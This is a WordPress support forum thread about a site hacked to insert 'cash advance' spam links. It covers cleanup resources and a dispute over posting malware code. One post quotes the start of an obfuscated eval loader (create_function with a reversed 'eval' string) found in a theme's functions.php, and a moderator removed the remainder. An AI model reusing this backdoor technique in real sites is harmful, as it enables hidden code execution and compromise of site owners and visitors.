Moderator
Jan Dembowski
(@jdembowski)
Forum Moderator and Brute Squad
If that’s happening to your site then you need to start working your way through these resources:
http://codex.wordpress.org/FAQ_My_site_was_hacked
http://wordpress.org/support/topic/268083#post-1065779
http://smackdown.blogsblogsblogs.com/2008/06/24/how-to-completely-clean-your-hacked-wordpress-installation/
http://ottopress.com/2009/hacked-wordpress-backdoors/
Anything less will probably result in the hacker walking straight back into your site again.
Additional Resources:
Hardening WordPress
http://sitecheck.sucuri.net/scanner/
http://www.unmaskparasites.com/
http://blog.sucuri.net/2012/03/wordpress-understanding-its-true-vulnerability.html
I see it has effected around 6,000 + wordpress according to google.
Sadly many people do not secure their WordPress sites or run on insecure hosts. It happens: you can lead them to water but you just can’t make them drink. 😉
Thread Starter
ey3wp
(@ey3wp)
Thanks for the advise.
I have been through all of the resources. Scanned all the site files looking for changes. Run appropriate security etc.
I have a feeling that is coming via compromised plugin. But I cant take do which one.
Hi guys,
Had the same problem with a client site as “ey3wp” and this is where was the problem:
I would this code at the very top of my functions.php file inside my active theme’s folder:
`<?php $wp_function_initialize = create_function(‘$a’,strrev(‘;)a$(lave’)); $wp_function_initialize(strrev(‘;))
[hacked code removed – please do not post that here]
Taking that out took care of the “cash advance” links being inserted on the fly into the content on every page.
However, there must be a security hole somewhere, so I am not done fighting yet 🙁
The site runs on WP 3.4 and is hosted on GoDaddy.
Hope this helps.
The site runs on WP 3.4
Running an old version of WP is a security risk – and possibly why your site was hacked. You really should get and keep that updated.
Also note that posting hacked code on these forums is not good – if you want to post it someplace, use a pastebin and post the link.
WPyogi,
I know the site should be updated but I can only advise. Now, they will probably want to do so 😉
Sorry about the code, I didn’t know. But if it doesn’t execute then what is the problem?
Moderator
Jan Dembowski
(@jdembowski)
Forum Moderator and Brute Squad
Sorry about the code, I didn’t know. But if it doesn’t execute then what is the problem?
The problem is we do not give air time to malware code or the spammy links that often accompanies that code. 😉
Seriously, sharing malware code here is not allowed. There is just never any good reason to post that.
Jan, what a noble cause but I have to disagree 🙂
Here is my reason:
I posted this code because that’s how I was able to solve my problem. In comments on a blog post about a similar issue someone posted the code. With that info available, I was able to run “Find and replace” on the whole WP site. And bingo I found where the malicious code was.
And since I was reading this thread I thought it might help someone else the same way because the the guy that started this thread has the same problem as me.
If this is not a good enough reason to post such a code then probably you are right – “There is just never any good reason to post that.”
Not all of us are geeks, so sometimes a concrete example helps a lot 😉
Unfortunately, your code could essentially infect the site. Putting those trying to help you in the path of malware isn’t cool. Drugs aren’t cool either.
Security holes are all over the place. Even if they don’t seem to exist in the latest releases of plugins and the WordPress platform, someone, somewhere is looking for a way in to your site. That’s why WordPress has standard URLs for cleaning your site, rather than finding the problem. While a professional can probably help you SOMEWHAT find the cause to an infection, it spreads so fast because users fail to secure their sites, making it almost impossible to be certain of the cause. The best we can do as the community trying to help you is offer solutions.
Sorry for posting the code, I didn’t know. Sorry. But you don’t have to be all over me 😉
I was trying to help the community by providing what I deleted from where. I never claimed that fixes the security hole, all I claimed was… well you can read above.
And if a client doesn’t want to pay me to update when I advise then I am not going to keep up with their website for free.
Sorry and thanks 😉
Besides, could you be more concrete about “standard URLs for cleaning”.
Thank you.
And I just got an email from a client wanting to update and do all that is necessary. I guess they got scared enough.
Moderator
Jan Dembowski
(@jdembowski)
Forum Moderator and Brute Squad
Jan, what a noble cause but I have to disagree 🙂
It’s good to disagree and smile. 😀
Not all of us are geeks, so sometimes a concrete example helps a lot 😉
…You didn’t actually read those articles I posted 2 days ago, right…?
Taking that out took care of the “cash advance” links being inserted on the fly into the content on every page.
Here’s the real problem with your solution: search and replace does not fix it. Ever. Which you fully realize and understand:
However, there must be a security hole somewhere, so I am not done fighting yet 🙁
Posting malware code is like showing people how your car was before you fixed it. It’s not valuable, it often contains spammy links, and you do not ever need to share that here.
Also? If you do not know what you are doing you could be giving people who know even less information that could harm their installations.
If you want to help people you can describe what steps you did not what it was you did it to. There are plenty of places to view malware code but these forums are not one of them.
Sorry.
I know half-ways what I am doing in terms of security.
I didn’t read all of your links.
I know the search and replace fixed the symptoms only.
Thank you for advice.
I am somewhat confused about this issue. What exactly is the hack your experiencing?
[links removed – please do not post links to your site in your posts – these forums are not for soliciting work in any way – see:
http://codex.wordpress.org/Forum_Welcome#Helping_Out%5D
